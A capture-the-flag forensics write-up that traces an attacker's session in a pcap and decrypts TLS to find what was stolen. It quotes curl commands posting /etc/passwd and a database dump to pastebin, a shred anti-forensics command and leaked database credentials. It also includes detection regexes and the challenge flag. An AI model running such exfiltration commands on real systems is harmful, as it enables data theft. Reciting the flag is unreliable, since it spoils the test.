
Marshal in the Middle

Write-up author: jon-brandy

DESCRIPTION:

The security team was alerted to suspicious network activity from a production web server. Can you determine if any data was stolen and what it was?

HINT:

  • NONE

STEPS:

  1. First, unzip the given .zip file.

RESULT

image

  2. Open the .pcap file in Wireshark.

image

  3. Now follow the TCP streams (Analyze -> Follow -> TCP Stream).
  4. The 2nd TCP stream is the attacker's shell session; that is where the clues are.

image

image

image

  5. From it we know that the attacker checked connectivity to a database server, then ran a script named exfildb.sh to dump the remote database. The database host, port and root password are passed on the command line, so they are readable in the capture:

```bash
./exfildb.sh mysql-m1.prod.htb 3306 root p4ssw0rd dbdump
```

  6. Then the attacker uploaded the contents of /etc/passwd to pastebin.com using curl. Note that `-d` sends the interpolated file contents verbatim, without URL encoding, and that the pastebin user and dev keys are the attacker's own:

```bash
pastetext=$(cat /etc/passwd) ; curl -d "api_user_key=ed67c1aec48d47270dd002d0baa29814&api_dev_key=bb8aa307a7d4b6073976149b65977bae&api_paste_private=2&api_option=paste&api_paste_code=${pastetext}" 'https://pastebin.com/api/api_post.php'
```

  7. It looks like the attacker uploaded the contents of /etc/passwd a second time.

image

  8. Next, the attacker used head to look at the first four lines of the dumpdb file.

image

  9. Then curl was used again, this time to upload the database dump to pastebin.com.

image

```bash
pastetext=$(cat dumpdb) ; curl -d "api_user_key=ed67c1aec48d47270dd002d0baa29814&api_dev_key=bb8aa307a7d4b6073976149b65977bae&api_paste_private=2&api_option=paste&api_paste_code=${pastetext}" 'https://pastebin.com/api/api_post.php'
```

  10. After that, the attacker removed the tools and the dumped database from the /tmp/.h4x directory. shred with -u overwrites each file (two passes here, -n2) and then unlinks it, so the staged files are not recoverable from disk; the capture is the only remaining copy of what was exfiltrated.

image

```bash
find /tmp/.h4x -type f -exec shred -vfun2 {} \;
```
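The session recovered from the TCP stream is short enough to read by hand, but the same triage is worth automating when there are many streams. The following is an added example, not part of the original write-up: a small, hypothetical indicator scan that tags each command as dump, sensitive-file read, paste-site exfil or anti-forensics, pulls out the files staged for upload and the database credentials. `SESSION` is rebuilt from the commands quoted above; the connectivity check and the head invocation are only described in the write-up, not shown, so they are left out rather than guessed. The rule names and the `triage`, `exfiltrated_files` and `credentials` functions are my own.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Session text rebuilt from the commands quoted in the write-up (constructed
# sample; the connectivity check and head command are not reproduced).
SESSION = r"""
./exfildb.sh mysql-m1.prod.htb 3306 root p4ssw0rd dbdump
pastetext=$(cat /etc/passwd) ; curl -d "api_user_key=ed67c1aec48d47270dd002d0baa29814&api_dev_key=bb8aa307a7d4b6073976149b65977bae&api_paste_private=2&api_option=paste&api_paste_code=${pastetext}" 'https://pastebin.com/api/api_post.php'
pastetext=$(cat /etc/passwd) ; curl -d "api_user_key=ed67c1aec48d47270dd002d0baa29814&api_dev_key=bb8aa307a7d4b6073976149b65977bae&api_paste_private=2&api_option=paste&api_paste_code=${pastetext}" 'https://pastebin.com/api/api_post.php'
pastetext=$(cat dumpdb) ; curl -d "api_user_key=ed67c1aec48d47270dd002d0baa29814&api_dev_key=bb8aa307a7d4b6073976149b65977bae&api_paste_private=2&api_option=paste&api_paste_code=${pastetext}" 'https://pastebin.com/api/api_post.php'
find /tmp/.h4x -type f -exec shred -vfun2 {} \;
"""

# Hypothetical, minimal rule set: (tag, pattern). Order defines tag order.
INDICATORS = [
    ("db-dump",        re.compile(r"\bexfildb\.sh\b|\bmysqldump\b")),
    ("sensitive-read", re.compile(r"\bcat\s+/etc/(?:passwd|shadow)\b")),
    ("paste-exfil",    re.compile(r"\bcurl\b.*\bpastebin\.com\b")),
    # shred -u unlinks after overwriting: deliberate anti-forensics
    ("anti-forensics", re.compile(r"\bshred\s+-[A-Za-z0-9]*u")),
]
STAGED = re.compile(r"\$\(\s*cat\s+(\S+?)\s*\)")       # pastetext=$(cat FILE)
DUMP_ARGS = re.compile(r"exfildb\.sh\s+(\S+)\s+(\d+)\s+(\S+)\s+(\S+)\s+(\S+)")


@dataclass
class Finding:
    line: int
    command: str
    tags: List[str] = field(default_factory=list)
    staged_file: Optional[str] = None            # file read into the paste body
    dump_target: Optional[Dict[str, str]] = None  # args given to exfildb.sh


def triage(session: str) -> List[Finding]:
    """Tag every non-empty command line; keep only lines that hit a rule."""
    findings: List[Finding] = []
    lines = [l for l in session.splitlines() if l.strip()]
    for n, cmd in enumerate(lines, 1):
        f = Finding(n, cmd, [tag for tag, rx in INDICATORS if rx.search(cmd)])
        m = STAGED.search(cmd)
        if m:
            f.staged_file = m.group(1)
        m = DUMP_ARGS.search(cmd)
        if m:
            # The last argument's meaning (database name or output file)
            # depends on the script itself, which is not in the capture.
            f.dump_target = dict(zip(("host", "port", "user", "password", "target"), m.groups()))
        if f.tags or f.staged_file:
            findings.append(f)
    return findings


def exfiltrated_files(session: str) -> List[str]:
    """Files whose contents were pushed to the paste site, in order."""
    return [f.staged_file for f in triage(session)
            if "paste-exfil" in f.tags and f.staged_file]


def credentials(session: str) -> Dict[str, str]:
    """Database credentials exposed on the command line of the dump script."""
    for f in triage(session):
        if f.dump_target:
            return {k: f.dump_target[k] for k in ("host", "port", "user", "password")}
    return {}


if __name__ == "__main__":
    for f in triage(SESSION):
        print(f.line, f.tags, f.staged_file or "", f.dump_target or "")
    print("exfiltrated:", exfiltrated_files(SESSION))
    print("db creds:", credentials(SESSION))
```

The output of `exfiltrated_files` is the answer to the challenge question (what was stolen), and `credentials` is the list of secrets that must be rotated after the incident regardless of what ended up on pastebin.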
  11. The next thing to do is to check what was uploaded to pastebin.com.
  12. First, point Wireshark at the secrets.log file extracted from the zip as the TLS (Pre)-Master-Secret log filename, so that the encrypted HTTPS traffic can be decrypted. The file is in the NSS key log format (CLIENT_RANDOM lines for TLS 1.2, per-direction traffic-secret lines for TLS 1.3), and it only helps for sessions whose client random appears in it.

STEPS

Go to Edit -> Preferences -> Protocols -> TLS, set "(Pre)-Master-Secret log filename" to the path of secrets.log, and click OK. Wireshark re-dissects the capture and the pastebin requests show up as plain HTTP.
  13. Now filter for HTTP requests whose Host header is pastebin.com. Before the key log is loaded this filter matches nothing, because the requests are still opaque TLS application data; after decryption Wireshark dissects them as HTTP.

COMMAND

http.host=="pastebin.com"

RESULT

image

  14. Following the 1st and the 2nd HTTP streams gave nothing useful.
  15. The 3rd one contains the flag. That ordering is consistent with the three curl uploads in the shell session: two posts of /etc/passwd followed by the database dump.

image
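Two checks a practitioner wants to script at this point, as an added example that is not part of the original write-up: first, parse the key log to see which TLS sessions it can actually decrypt (a key log that lacks the client random of the interesting session, or holds only handshake secrets for a TLS 1.3 session, will leave the HTTP body encrypted and the filter above empty); second, pull the paste text out of a decrypted pastebin `api_post.php` request body without mangling it. The key log lines and the request body below are constructed samples, not the challenge's secrets.log or capture, and the function names are my own.

```python
import re
from typing import Dict, List
from urllib.parse import parse_qs

# One NSS key log entry: LABEL <client_random hex> <secret hex>.
KEYLOG_LINE = re.compile(
    r"^(?P<label>[A-Z][A-Z_0-9]*)\s+(?P<client_random>[0-9a-fA-F]{64})\s+(?P<secret>[0-9a-fA-F]+)\s*$"
)


def parse_keylog(text: str) -> Dict[str, List[str]]:
    """Map client_random -> labels present. Comments, blank lines and
    malformed lines are skipped (Wireshark ignores them as well)."""
    sessions: Dict[str, List[str]] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = KEYLOG_LINE.match(line)
        if m:
            sessions.setdefault(m["client_random"].lower(), []).append(m["label"])
    return sessions


def decryptable_sessions(text: str) -> List[str]:
    """Client randoms with enough material to read application data:
    a master secret (TLS 1.2) or both application traffic secrets (TLS 1.3)."""
    wanted_13 = {"CLIENT_TRAFFIC_SECRET_0", "SERVER_TRAFFIC_SECRET_0"}
    return [cr for cr, labels in parse_keylog(text).items()
            if "CLIENT_RANDOM" in labels or wanted_13 <= set(labels)]


def extract_paste(body: str) -> Dict[str, str]:
    """Split a pastebin api_post.php request body.

    The attacker used `curl -d` with the file contents interpolated into the
    form string, so api_paste_code is not URL-encoded: it can contain raw
    newlines, '&' and '%'. Because it is the last field, everything after
    'api_paste_code=' is the pasted text; only the fields before it are
    parsed as a normal query string."""
    head, sep, paste = body.partition("api_paste_code=")
    if not sep:
        raise ValueError("no api_paste_code field in body")
    fields = {k: v[0] for k, v in parse_qs(head.rstrip("&")).items()}
    fields["api_paste_code"] = paste
    return fields


# Constructed samples (not from the challenge files).
CR_TLS12, CR_TLS13, CR_PARTIAL = "11" * 32, "22" * 32, "33" * 32
SAMPLE_KEYLOG = "\n".join([
    "# constructed key log, not the challenge's secrets.log",
    f"CLIENT_RANDOM {CR_TLS12} {'aa' * 48}",
    f"CLIENT_HANDSHAKE_TRAFFIC_SECRET {CR_TLS13} {'bb' * 32}",
    f"SERVER_HANDSHAKE_TRAFFIC_SECRET {CR_TLS13} {'cc' * 32}",
    f"CLIENT_TRAFFIC_SECRET_0 {CR_TLS13} {'dd' * 32}",
    f"SERVER_TRAFFIC_SECRET_0 {CR_TLS13} {'ee' * 32}",
    f"CLIENT_HANDSHAKE_TRAFFIC_SECRET {CR_PARTIAL} {'ff' * 32}",  # handshake only
    "not a key log line",
])
SAMPLE_BODY = (
    "api_user_key=0123456789abcdef0123456789abcdef"
    "&api_dev_key=fedcba9876543210fedcba9876543210"
    "&api_paste_private=2&api_option=paste"
    "&api_paste_code=root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
)

if __name__ == "__main__":
    print("decryptable:", decryptable_sessions(SAMPLE_KEYLOG))
    print(extract_paste(SAMPLE_BODY)["api_paste_code"])
```

The same decryption can be done from the command line instead of the GUI, which is handier when dumping all three paste bodies at once: `tshark -r <capture>.pcap -o tls.keylog_file:secrets.log -Y 'http.host == "pastebin.com"' -T fields -e http.file_data` (capture filename assumed), and each extracted body can then be passed to `extract_paste`.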

FLAG

HTB{Th15_15_4_F3nD3r_Rh0d35_M0m3NT!!}